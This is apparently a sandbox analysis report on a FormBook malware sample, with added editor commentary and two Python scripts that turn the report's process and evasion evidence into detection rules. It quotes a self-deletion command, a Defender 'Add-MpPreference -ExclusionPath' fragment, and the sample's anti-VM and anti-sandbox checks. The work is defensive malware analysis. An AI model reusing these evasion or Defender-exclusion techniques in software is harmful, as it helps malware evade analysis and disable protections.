Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: s6G3ZtvHZg.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@16/9
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\s6G3ZtvHZg.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Mutant created: \Sessions\1\BaseNamedObjects\kkigloYTgmEpnQoD
Source: s6G3ZtvHZg.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: s6G3ZtvHZg.exe Virustotal: Detection: 27%
Source: s6G3ZtvHZg.exe ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: s6G3ZtvHZg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header: together with the mscorrc.dll load above this identifies the submitted file as a .NET assembly, i.e. a managed first stage in front of the native FormBook code)
          Source: s6G3ZtvHZg.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
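          The process chain above (sample re-launching its own image twice, explorer.exe starting help.exe with no arguments, help.exe starting cmd.exe to delete the original file) is the part of this report that maps most directly onto endpoint detection rules. The following Python is an added example written for this page, not sandbox output or FormBook code: it encodes the three relationships as rules and runs them over the "Process created" events transcribed from the report. The rule names, the path normalisation and the system-directory list are the editor's choices.

```python
"""Process-tree triage for the chain of "Process created" events recorded above.

Added example (editor-written), not output of the sandbox. The events are
transcribed from this report; rule names and heuristics are the editor's.
"""
import re
from typing import List, Optional, Tuple

Event = Tuple[Optional[str], str, str]   # (parent image, child image, child command line)

# Transcribed from the "Process created" lines of this report.
PROCESS_EVENTS: List[Event] = [
    (None, r"C:\Users\user\Desktop\s6G3ZtvHZg.exe", r"'C:\Users\user\Desktop\s6G3ZtvHZg.exe'"),
    (r"C:\Users\user\Desktop\s6G3ZtvHZg.exe", r"C:\Users\user\Desktop\s6G3ZtvHZg.exe", r"C:\Users\user\Desktop\s6G3ZtvHZg.exe"),
    (r"C:\Users\user\Desktop\s6G3ZtvHZg.exe", r"C:\Users\user\Desktop\s6G3ZtvHZg.exe", r"C:\Users\user\Desktop\s6G3ZtvHZg.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\help.exe", r"C:\Windows\SysWOW64\help.exe"),
    (r"C:\Windows\SysWOW64\help.exe", r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Directories whose binaries an injected explorer.exe may pick as a host process.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _norm(path: str) -> str:
    """Lower-case and strip the quoting that cmd.exe and the report put around paths."""
    return path.strip("'\"").lower()


def _image_name(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def _in_system_dir(image: str) -> bool:
    return _norm(image).startswith(SYSTEM_DIRS)


def find_self_spawn(events: List[Event]) -> List[str]:
    """A process starting a fresh copy of its own image: the launch pattern of a
    loader that creates a suspended child of itself and replaces its memory."""
    return [child for parent, child, _ in events if parent and _norm(parent) == _norm(child)]


def find_explorer_lolbin_shell(events: List[Event]) -> List[str]:
    """explorer.exe launches a system-directory binary, which in turn launches cmd.exe."""
    hits = []
    for parent, child, _ in events:
        if parent and _image_name(parent) == "explorer.exe" and _in_system_dir(child):
            if any(p and _norm(p) == _norm(child) and _image_name(c) == "cmd.exe" for p, c, _ in events):
                hits.append(child)
    return hits


DEL_RE = re.compile(r"\bdel\s+(['\"]?)(.+?)\1\s*$", re.IGNORECASE)


def find_self_deletion(events: List[Event]) -> List[str]:
    """cmd.exe deleting a file that is the image of a process in the same tree."""
    images = {_norm(child) for _, child, _ in events}
    hits = []
    for _, child, cmdline in events:
        m = DEL_RE.search(cmdline) if _image_name(child) == "cmd.exe" else None
        if m and _norm(m.group(2)) in images:
            hits.append(m.group(2))
    return hits


def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Run all three rules and return (rule, detail) findings in rule order."""
    findings = [("self-spawn", img) for img in find_self_spawn(events)]
    findings += [("explorer-lolbin-shell", img) for img in find_explorer_lolbin_shell(events)]
    findings += [("self-deletion", path) for path in find_self_deletion(events)]
    return findings


if __name__ == "__main__":
    for rule, detail in triage(PROCESS_EVENTS):
        print(f"{rule:22s} {detail}")
```

On this report the three rules fire on the two self-spawns, on help.exe, and on the deletion of the original sample path. The second rule deliberately keys on the parent/child shape rather than on the name help.exe, because the system binary that explorer.exe picks as host is not fixed.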
          Source: Binary string: wntdll.pdbUGP source: s6G3ZtvHZg.exe, 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, help.exe, 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: s6G3ZtvHZg.exe, help.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 0_2_00C804D0 push C03300AFh; ret 0_2_00C804E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_004152F5 push esi; retf 3_2_00415301
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041536A push esi; retf 3_2_00415301
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041B3F2 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041B3FB push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041B3A5 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0041B45C push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_0178D0D1 push ecx; ret 3_2_0178D0E4
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_02E1D0D1 push ecx; ret 14_2_02E1D0E4
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A52F5 push esi; retf 14_2_003A5301
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003A536A push esi; retf 14_2_003A5301
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003AB3A5 push eax; ret 14_2_003AB3F8
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003AB3FB push eax; ret 14_2_003AB462
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003AB3F2 push eax; ret 14_2_003AB3F8
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003AB45C push eax; ret 14_2_003AB462
          Source: C:\Windows\SysWOW64\help.exe Code function: 14_2_003ABDAE push esp; iretd 14_2_003ABDB1
          The help.exe entries are the same code at a different base: 14_2_003A52F5 and 3_2_004152F5 differ by exactly 0x70000 (as do every other pair in the 0x3Axxxx/0x41xxxx range), and 14_2_02E1D0D1 - 0x02DA0000 = 3_2_0178D0D1 - 0x01710000 = 0x7D0D1, the same offset inside the two regions in which the report found the wntdll.pdb string.
          Source: initial sample Static PE information: section name: .text entropy: 7.94799509268 (close to the 8.0 maximum for byte entropy, consistent with packed or encrypted content)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process information set: NOOPENFILEERRORBOX (39 identical events; SetErrorMode with SEM_NOOPENFILEERRORBOX suppresses the "file not found" dialog)
          Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (SEM_NOGPFAULTERRORBOX additionally suppresses the crash dialog, so a faulting injected process exits silently)

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: s6G3ZtvHZg.exe PID: 6076, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME (wine_get_unix_file_name is a kernel32 export that exists only under Wine)
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL (the DLL Sandboxie injects into every sandboxed process)
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000003985E4 second address: 00000000003985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 000000000039896E second address: 0000000000398974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Thread delayed: delay time: 922337203685477 (this is .NET TimeSpan.MaxValue in whole milliseconds, (2^63-1)/10000 ticks: a sleep-forever stall, not a real timer)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6092 Thread sleep time: -104796s >= -30000s
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6152 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2148 Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 1528 Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed (x2)
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Thread delayed: delay time: 104796
          Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000002.522445259.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.272267558.00000000069D9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Process queried: DebugPort (NtQueryInformationProcess with ProcessDebugPort, non-zero when a debugger is attached)
          Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
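          Two things in the evasion evidence above deserve separating before it is summarised. First, only the strings dumped from the sample's own process (the 00000000.00000002 dump of s6G3ZtvHZg.exe) are the malware's checks: SbieDll.dll, the Wine export, the VMware Tools registry key, the HARDWARE\DEVICEMAP\Scsi and Services\Disk\Enum keys, the display-adapter class GUID {4D36E968-E325-11CE-BFC1-08002BE10318} next to "VMware SVGA II", and, sitting right after it, a PowerShell "Add-MpPreference -ExclusionPath" fragment, i.e. a Defender exclusion command carried by the first stage. The VMware SATA/SCSI device names and Hyper-V messages attributed to explorer.exe are the analysis VM's own device enumeration and resource text, present in every explorer.exe on that host, and say nothing about the sample. Second, the delay values: 922337203685477 ms is exactly .NET TimeSpan.MaxValue, so that thread is parked forever, while the other sleeps merely exceed the 30 s threshold the report applies. The Python below is an added example written for this page, not sandbox output; it parses report lines transcribed above, attributes strings to sample or host, labels the markers, and classifies the delays. The marker catalogue, labels and attribution rule are the editor's assumptions.

```python
"""Sandbox-evasion evidence triage over lines transcribed from this report.

Added example (editor-written), not sandbox output. Marker labels, the
sample-vs-host attribution rule and the sleep classes are the editor's;
the 30 s threshold is the one the report itself prints.
"""
import re
from typing import Dict, List, Optional, Tuple

SAMPLE_NAME = "s6G3ZtvHZg.exe"
# .NET TimeSpan.MaxValue is 2**63-1 ticks of 100 ns, i.e. 922337203685477 whole milliseconds.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
SLEEP_THRESHOLD_MS = 30_000

SLEEP_RE = re.compile(r"Thread sleep time: -?(\d+)s|Thread delayed: delay time: (\d+)")
STRING_RE = re.compile(r"^Source: ([^,\s]+).*?Binary or memory string: (.*)$")

# (substring, label) in priority order; the generic VMware label applies only when nothing specific matched.
MARKERS: List[Tuple[str, str]] = [
    ("SBIEDLL.DLL", "Sandboxie DLL name"),
    ("WINE_GET_UNIX_FILE_NAME", "Wine kernel32 export"),
    ("SOFTWARE\\VMware, Inc.\\VMware Tools", "VMware Tools registry key"),
    ("HARDWARE\\DEVICEMAP\\Scsi", "SCSI identifier registry key"),
    ("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "disk enumeration registry key"),
    ("{4D36E968-E325-11CE-BFC1-08002BE10318}", "display adapter class GUID"),
    ("VMware SVGA II", "VMware display adapter name"),
    ("Add-MpPreference -ExclusionPath", "Defender exclusion command"),
    ("Hyper-V", "Hyper-V text"),
]
GENERIC = ("vmware", "VMware string")

# Transcribed from the report lines above (constructed input for this example).
REPORT_LINES = [
    "Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL",
    "Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME",
    r"Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools",
    r'Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "',
    "Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0",
    "Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.",
    r"Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6092 Thread sleep time: -104796s >= -30000s",
    r"Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6152 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 2148 Thread sleep time: -55000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\help.exe TID: 1528 Thread sleep time: -48000s >= -30000s",
    r"Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Thread delayed: delay time: 922337203685477",
]


def parse_sleep_ms(line: str) -> Optional[int]:
    """Extract the delay in milliseconds from either of the report's two sleep line shapes."""
    m = SLEEP_RE.search(line)
    return int(m.group(1) or m.group(2)) if m else None


def classify_delay(ms: int) -> str:
    if ms == TIMESPAN_MAX_MS:
        return "timespan-max-sentinel"      # park-forever, not a timer the sandbox can wait out
    return "long-sleep" if ms > SLEEP_THRESHOLD_MS else "normal"


def match_markers(s: str) -> List[str]:
    low = s.lower()
    labels = [label for needle, label in MARKERS if needle.lower() in low]
    if not labels and GENERIC[0] in low:
        labels.append(GENERIC[1])
    return labels


def attribute(source: str) -> str:
    """Strings from the sample's own processes are its checks; strings from
    explorer.exe are the analysis VM's own device and resource text."""
    return "sample" if SAMPLE_NAME.lower() in source.lower() else "host"


def triage(lines: List[str]) -> Dict[str, list]:
    out: Dict[str, list] = {"delays": [], "sample_markers": [], "host_markers": []}
    for line in lines:
        ms = parse_sleep_ms(line)
        if ms is not None:
            out["delays"].append((ms, classify_delay(ms)))
            continue
        m = STRING_RE.match(line)
        if m:
            labels = match_markers(m.group(2))
            if labels:
                out[attribute(m.group(1)) + "_markers"].append((m.group(2), labels))
    return out


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    for key, items in result.items():
        print(key)
        for item in items:
            print("   ", item)
```

Run over the transcribed lines it yields four sample-attributed markers (including the Defender exclusion fragment), two host-only markers that should be discounted, and five delays of which two are the TimeSpan.MaxValue sentinel.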
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe Code function: 3_2_00409B10 LdrLoadDll
